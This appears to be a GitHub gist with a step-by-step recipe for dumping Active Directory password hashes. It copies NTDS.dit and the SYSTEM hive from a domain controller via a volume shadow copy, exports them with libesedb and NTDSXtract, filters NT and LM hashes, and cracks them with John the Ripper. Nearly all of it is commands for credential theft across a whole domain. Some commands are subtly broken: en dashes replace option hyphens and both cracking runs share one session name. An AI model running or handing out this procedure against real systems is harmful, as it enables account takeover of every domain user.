Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
Microsoft stores the Active Directory data in tables in a proprietary ESE database format. The database is contained in the NTDS.dit (%SystemRoot%\ntds\NTDS.dit) file.
This file is encrypted to prevent any data extraction, so we will need to acquire the key to be able to perform the extraction of the target data.
The required Password Encryption Key is stored in the NTDS.dit file, but is encrypted itself with the BOOTKEY.
To obtain this BOOTKEY, we need to acquire a copy of the SYSTEM registry hive (%SystemRoot%\System32\config\System) from the same Domain Controller as we acquired the NTDS.dit file.
Extract NTDS/SYSTEM from a domain controller:
net start vss
vssadmin create shadow /for=c:
vssadmin list shadows
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\temp
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SYSTEM C:\temp
Pre-requisites installation (on a Kali):
tar -zxf libesedb-alpha-20120102.tar.gz
cd libesedb-20120102/
./configure && make && sudo make install
Hashes extraction and crack:
./esedbexport ntds.dit
python NTDSXtract 1.0/ ntds.dit.export/datatable.4 ntds.dit.export/link_table.7 –passwordhashes hklm_system.sav
grep -A 2 “Password hashes:” dsusers.results |grep -v “Password hashes” |grep -v 'Record ID'|grep -v “\-\-” |sort|uniq > allHashes
grep '\$NT\$' allHashes | sed 's/.\(.*\)/\1/' > NTHashes
grep -v '\$NT\$' allHashes | sed 's/.\(.*\)/\1/' > LMHashes
john –session=LM LMHashes &
john –session=LM NTHashes &
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment